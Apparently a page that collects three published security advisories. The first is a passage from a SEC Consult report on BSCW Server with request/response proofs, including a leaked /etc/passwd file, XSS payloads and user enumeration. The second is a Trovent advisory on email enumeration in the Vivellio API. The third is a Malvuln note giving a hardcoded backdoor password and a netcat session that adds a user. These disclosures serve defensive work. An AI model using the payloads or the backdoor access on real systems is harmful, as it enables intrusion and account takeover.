1<br />Connection: keep-alive<br />Cookie: MicroblogInboxIndicatorState=%5B1630932508%2C0%5D; MicroblogSlidingPanelDisplayState=%22hidden%22; <br />_sec_bscws="ce8ee39692303f447b50560277dd49f9:51"; bscw_auth="Gpx4/TavfN/lApZ7kyIwEH+Fy4aDTdhB:33"; _pub_bscws="6137c54f:0"<br />Upgrade-Insecure-Requests: 1<br /><br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 CSS<br />Date: Tue, 07 Sep 2021 20:02:35 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Expires: Tue, 07 Sep 2021 18:02:35 GMT<br />Content-Type: text/css<br />Vary: Accept-Encoding<br />Content-Length: 1049<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br /><br /><br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />_apt:x:100:65534::/nonexistent:/usr/sbin/nologin<br />openldap:x:101:102:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false<br />bscw:x:999:999:BSCW system user:/opt/bscw:/bin/bash<br />-------------------------------------------------------------------------------<br /><br />6) Unauthenticated reflected XSS - refresh<br /><br />Getting an alert box:<br /><br />-------------------------------------------------------------------------------<br />GET <br />/pub/bscw.cgi/30?op=refresh¬ify=1¬ify_args=_type¬ify_args=body¬ify_args=mimetype¬ify_args=encoding&encoding=utf-8%0d%0afoo:%20bar&mimetype=text/html&_type=body&body=<@urlencode><script>alert(document.domain)</script><@/urlencode> <br />HTTP/1.1<br /><br /><br />Response:<br /><br />HTTP/1.1 200 bscw_dialog<br />Date: Fri, 10 Sep 2021 21:16:35 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Expires: Fri, 10 Sep 2021 19:16:35 GMT<br />Content-Type: text/html<br />Content-Length: 39<br />Set-Cookie: _pub_bscws="327c299e8c460787f98700155696c946:2"; expires=Wed, 03 Mar 2027 21:16:35 GMT; httponly; Path=/pub/; Version=1<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br /><br /><script>alert(document.domain)</script><br />-------------------------------------------------------------------------------<br /><br />7) Unauthenticated reflected XSS - upload_browser<br /><br />The value gets written to the following block:<br /><br />-------------------------------------------------------------------------------<br /><script type="text/javascript"><br />//<![CDATA[<br /><br />function CloseWindow(){<br />window.close();<br />}<br />function SetUrl(url){<br />window.opener.CKEDITOR.tools.callFunction(INJECT_ME, '.');<br />// ^^^ Clear protocol field<br />window.opener.CKEDITOR.tools.callFunction(INJECT_ME, url);<br />}<br />// ....<br /><br />//]]><br /></script><br />-------------------------------------------------------------------------------<br />To escape the function call and keep the `JavaScript` code valid, which is<br />required to get executed, the following payload can be used:<br /><br />`foo)};alert(document.domain);function%20a(){m(a`<br /><br />The resulting code looks like this:<br /><br />-------------------------------------------------------------------------------<br /><script type="text/javascript"><br />//<![CDATA[<br /><br />function CloseWindow(){<br />window.close();<br />}<br />function SetUrl(url){<br />window.opener.CKEDITOR.tools.callFunction(foo)};alert(document.domain);function a(){m(a, '.');<br />// ^^^ Clear protocol field<br />window.opener.CKEDITOR.tools.callFunction(foo)};alert(document.domain);function a(){m(a, url);<br />}<br />//..<br />//]]><br /></script><br />-------------------------------------------------------------------------------<br /><br /><br />8) Unauthenticated user enumeration<br /><br />If the verification of the token fails, an error message is shown to the user<br />that he needs to re-authenticate. This message does contain the username if the<br />provided `USERID` is valid.<br /><br />-------------------------------------------------------------------------------<br />GET /sec/bscw.cgi/2 HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: keep-alive<br />Cookie: _sec_bscws="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:264"<br />Upgrade-Insecure-Requests: 1<br /><br />-------------------------------------------------------------------------------<br /><br />-------------------------------------------------------------------------------<br /><p class="hint"><br />Authenticate yourself for BSCW Shared Workspace Server (sec) at bscw.local.<br /><br /><br /><a href="/pub/bscw.cgi?op=chpwd">Forgot your password?</a><br /></p><br /><table width="100%" border="0" cellspacing="0" cellpadding="0"><br /><tr><br /><th scope="row"><br /><label for="uname">User name:</label><br /></th><br /><td><br /><span class="strong">foo</span><br /><input type="hidden" name="username" value="foo" /><br /><br /></td><br /></tr><br /><tr><br /><th scope="row"><br /><label for="pwd">Password:</label><br /></th><br /><td><br /><input class="inputfield" id="pwd" size="40" type="password" name="passwd" value="" /><br /></td><br /></tr><br />-------------------------------------------------------------------------------<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />BSCW Classic 5.2.4 was used to find the vulnerability.<br />The vendor confirmed that following versions also affected by the vulnerability:<br /><br />BSCW Server 5.0.11, 5.1.9, 5.2.4, 7.3.2, <=7.4.3<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-09-11: Sent report to vendor<br />2021-09-12: Vendor confirmed the issue and is working on a patch<br />2021-11-13: Vendor notified licensed customer about the issue and a patch<br />2021-11-25: Requesting CVE numbers (Mitre)<br />2021-11-26: Got email confirmation from Mitre, but no CVE numbers yet<br />2021-11-29: Scheduled advisory release for 2021-12-01, coordinated with vendor<br />2021-12-01: Postponing release because of missing CVE numbers (asked again)<br />2021-12-02: Release of security advisory without CVE numbers.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version v5.2.5 and v7.4.4 for the affected and<br />supported products which should be installed immediately.<br /><br />https://www.bscw.de/social/#download<br />https://www.bscw.de/classic/#download<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Armin Stock / @2021<br /><br /><br /></code></pre>
<pre><code># Trovent Security Advisory 2108-01 #<br />#####################################<br /><br /><br />User account enumeration in password reset function<br />###################################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2108-01<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2108-01<br />Affected product: Vivellio Android mobile application (com.netural.vivellio)<br />Tested versions: Vivellio 1.2.1<br />Vendor: blockhealth GmbH, https://www.vivellio.app<br />Credits: Trovent Security GmbH, Karima Hebbal<br /><br /><br />Detailed description<br />####################<br /><br />The Vivellio mobile application is used to store health information.<br />Trovent Security GmbH discovered a user account enumeration vulnerability in<br />the password reset function of the Vivellio mobile application.<br />The Vivellio server API allows checking if a user with a specific email address<br />is registered or not.<br /><br />Severity: Medium<br />CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br />CWE ID: CWE-204<br />CVE ID: N/A<br /><br /><br />Proof of concept<br />################<br /><br />Sample HTTP request sent with a non-registered email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />POST /user/reset-password HTTP/1.1<br />Host: app-gate.vivellio.app<br />Accept: application/json<br />Content-Type: application/json; charset=UTF-8<br />Content-Length: 28<br />Accept-Encoding: gzip, deflate<br />User-Agent: okhttp/3.14.1<br />Connection: close<br /><br /><br />{"email":"false@gmail.com"}<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />The server response to an invalid email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />HTTP/1.1 404 <br /><br />Cache-Control: no-cache, no-store, max-age=0, must-revalidate<br />Content-Type: application/json;charset=UTF-8<br />Date: Mon, 30 Aug 2021 11:26:59 GMT<br />Expires: 0<br />Pragma: no-cache<br />Server: openresty/1.15.8.1<br />Vary: Accept-Encoding<br />X-Content-Type-Options: nosniff<br />X-Frame-Options: DENY<br />X-XSS-Protection: 1; mode=block<br />Content-Length: 1437<br />Connection: Close<br /><br /><br />{"cause":null,"stackTrace":[{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"createPasswordResetProcess","fileName":"UserControllerImpl.java","lineNumber":539,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false},<br />{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserControllerImpl.java","lineNumber":85,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false},<br />{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserServiceImpl.java","lineNumber":52,"className":"ai.blockhealth.carify.user.service.UserServiceImpl","nativeMethod":false},<br />{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserApi.java","lineNumber":61,"className":"ai.blockhealth.carify.user.UserApi","nativeMethod":false},<br />{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"doFilterInternal","fileName":"VivellioRequestLogger.java","lineNumber":56,"className":"ai.blockhealth.carify.filter.VivellioRequestLogger","nativeMethod":false}],<br />"message":"The email false@gmail.com could not be linked to an existing account.","suppressed":[],"localizedMessage":"The email false@gmail.com could not be linked to an existing account.","exceptionClass":"EmailNotFoundException"<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />Ensure the application returns a consistent message for both existent and<br />nonexistent accounts during the password reset process.<br /><br />Fixed in Vivellio server API, verified by Trovent.<br /><br /><br />History<br />#######<br /><br />2021-08-30: Vulnerability found & advisory created<br />2021-09-24: Vendor contacted<br />2021-09-27: Vendor replied<br />2021-12-18: Vendor reported that the vulnerability is fixed<br />2022-01-26: Trovent verified the fix of the vulnerability<br />2022-02-03: Advisory published<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8170928cd3e0f1a79b9d40ae19a4d217.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.WinShell.50<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 1990. Authentication is required for remote user access. However, the password "tdkhbhhesdth" is weak and hardcoded within the executable. <br />Type: PE32<br />MD5: 8170928cd3e0f1a79b9d40ae19a4d217<br />Vuln ID: MVID-2021-0416<br />Disclosure: 12/03/2021<br /><br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 1990<br />WeLCoMe to X-FileZzZ & The^GoBLiN PubStro plz press password :tdkhbhhesdth<br /><br />WinShell v5.0 (C)2002 janker.org<br /><br />? for help<br />CMD>s<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\dump>net user MALVULN hell /add<br />net user MALVULN hell /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>